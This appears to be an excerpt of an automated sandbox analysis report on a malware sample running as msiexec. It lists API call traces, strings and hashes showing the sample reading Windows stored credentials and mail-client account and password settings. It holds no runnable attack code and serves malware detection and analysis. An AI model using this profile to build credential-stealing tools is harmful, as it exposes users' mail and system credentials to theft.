                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                • String ID: \systemroot
                                                                                                                                                • API String ID: 912701516-1821301763
                                                                                                                                                • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$strlen
                                                                                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                • API String ID: 2619041689-3408036318
                                                                                                                                                • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                • memset.MSVCRT ref: 0040882A
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                • String ID: J$Microsoft_WinInet
                                                                                                                                                • API String ID: 3318079752-260894208
                                                                                                                                                • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004037EB
                                                                                                                                                • memset.MSVCRT ref: 004037FF
                                                                                                                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                • strchr.MSVCRT ref: 0040386E
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                • strlen.MSVCRT ref: 00403897
                                                                                                                                                • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                                                                                • String ID: %s@yahoo.com
                                                                                                                                                • API String ID: 2240714685-3288273942
                                                                                                                                                • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                • API String ID: 888011440-2039793938
                                                                                                                                                • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                • strchr.MSVCRT ref: 0040327B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringstrchr
                                                                                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                • API String ID: 1348940319-1729847305
                                                                                                                                                • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040F567
                                                                                                                                                • memset.MSVCRT ref: 0040F57F
                                                                                                                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 78143705-3916222277
                                                                                                                                                • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                  • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                  • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                • strchr.MSVCRT ref: 0040371F
                                                                                                                                                • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                • strlen.MSVCRT ref: 00403778
                                                                                                                                                • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                • String ID: %s@gmail.com
                                                                                                                                                • API String ID: 3261640601-4097000612
                                                                                                                                                • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004094C8
                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                • memset.MSVCRT ref: 0040950C
                                                                                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                • API String ID: 3411445237-4169760276
                                                                                                                                                • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403504
                                                                                                                                                • memset.MSVCRT ref: 0040351A
                                                                                                                                                • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                • API String ID: 632640181-966475738
                                                                                                                                                • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                APIs
                                                                                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3642520215-0
                                                                                                                                                • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                APIs
                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1999381814-0
                                                                                                                                                • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                • API String ID: 1297977491-3883738016
                                                                                                                                                • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
• Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
• Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
• Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
• Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: __aulldvrm$__aullrem
• String ID: -$-x0$0123456789ABCDEF0123456789abcdef
• API String ID: 643879872-978417875
• Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
• Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
• Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
• Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
APIs
• memset.MSVCRT ref: 0040810E
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
• LocalFree.KERNEL32(?,?,?,?,?,00000000,67CD7B60,?), ref: 004081B9
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
• String ID: POP3_credentials$POP3_host$POP3_name
• API String ID: 524865279-2190619648
• Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
• Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
• Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
• Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetstrchr
• String ID: 0$6
• API String ID: 2300387033-3849865405
• Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
• Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
• Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
• Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
APIs
• memset.MSVCRT ref: 004076D7
• sprintf.MSVCRT ref: 00407704
• strlen.MSVCRT ref: 00407710
• memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
• strlen.MSVCRT ref: 00407733
• memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: memcpystrlen$memsetsprintf
• String ID: %s (%s)
• API String ID: 3756086014-1363028141
